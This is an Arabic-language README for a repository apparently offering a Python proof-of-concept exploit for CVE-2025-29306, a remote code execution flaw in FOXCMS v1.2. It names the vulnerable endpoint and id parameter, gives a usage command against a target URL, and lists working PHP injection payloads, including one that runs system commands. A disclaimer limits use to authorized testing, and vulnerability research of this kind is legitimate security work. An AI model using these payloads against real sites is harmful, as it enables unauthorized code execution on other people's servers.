
Python PoC لـ CVE-2025-29306، وهو ثغرة حقن معامل RCE في FOXCMS v1.2. يقوم بحقن كود PHP عبر معامل id في /images/index.html لاختبار الأمان المصرح به.
يحتوي هذا المستودع على إثبات مفهوم (PoC) بلغة بايثون لثغرة تنفيذ الأوامر عن بعد (RCE) تؤثر على إصدار FOXCMS v1.2، وهو نظام إدارة محتوى صيني مفتوح المصدر.
معرف CVE: CVE-2025-29306
المتأثر: FOXCMS v1.2
النوع: حقن معامل الخدمة → تنفيذ كود
يعاني FOXCMS من آلية تحليل معامل غير آمنة في المعامل id على نقطة النهاية /images/index.html. وهذا يسمح بحقن حمولات باستخدام تعبيرات ${@print()}، مما يؤدي إلى تنفيذ كود PHP.
requestspip install requests
# Usage
python foxcms_poc.py http://target.com/images/index.html?id=
# The script uses payloads like:
${@print(phpinfo())}
${@print(system('id'))}
# 🔐 إخلاء مسؤولية قانوني
هذا الكود مخصص للأغراض التعليمية واختبارات الأمان المصرح بها فقط.
لا تستخدمه على أنظمة لا تملكها أو ليس لديك إذن لاختبارها.
المؤلف
Inok009